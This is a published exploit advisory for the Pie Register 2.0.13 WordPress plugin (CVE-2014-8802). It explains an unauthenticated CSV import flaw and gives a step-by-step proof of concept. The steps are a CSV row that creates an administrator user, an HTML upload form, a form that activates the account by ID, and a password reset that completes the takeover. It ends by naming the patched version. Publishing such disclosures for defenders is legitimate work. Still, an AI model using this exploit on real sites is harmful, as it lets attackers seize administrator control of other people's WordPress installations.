Skip to content
cyberexploits
webappphptext

WordPress Plugin Pie Register 2.0.13 - Privilege Escalation

WordPress Plugin Pie Register 2.0.13 - Privilege Escalation

Published on 2015-01-16

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/35823.txt7eac4c3a
raw
# Exploit Title: Pie Register 2.0.13 Privilege escalation

# Date: 16-10-2014

# Software Link: https://wordpress.org/plugins/pie-register/

# Exploit Author: Kacper Szurek

# Contact: http://twitter.com/KacperSzurek

# Website: http://security.szurek.pl/

# CVE: CVE-2014-8802

# Category: webapps



1. Description

  

Anyone can import CSV file. Pie Register will import users from this file.



File: pie-register\pie-register.php



add_action( 'init', array($this,'pie_main') );

function pie_main() {

	// I skip unnecessary lines

	if(isset($_FILES['csvfile']['name'])) {

		$this->importUsers();

	}

}



http://security.szurek.pl/pie-register-2013-privilege-escalation.html



2. Proof of Concept



Create CSV file based on given example:



"Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role"

"hack","Hacked","hacked@hacked.hacked","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator"



Import account using:



<form method="post" action="http://wordpress-instalation" enctype="multipart/form-data">

    Input CSV<input type="file" name="csvfile">

    <input type="submit" value="Add user!">

</form>



Create another standard account using wp-login.php?action=register.



After login go to wp-admin/profile.php and search "uid" in page source.



Number after "uid" is our current account id. For example: "uid":"123".



We can assume that previously imported admin account has id-1 (or id-x where x is natural number).



We can activate this account using:



<form method="post" action="http://wordpress-instalation">

    <input type="hidden" name="verifyit" value="1">

    Account id:<input type="text" name="vusers[]" value="">

    <input type="submit" value="Activate user!">

</form>



Finally we can reset password using: http://wordpress-instalation/wp-login.php?action=lostpassword

  

3. Solution:

  

Update to version 2.0.14

https://downloads.wordpress.org/plugin/pie-register.2.0.14.zip
View on GitHub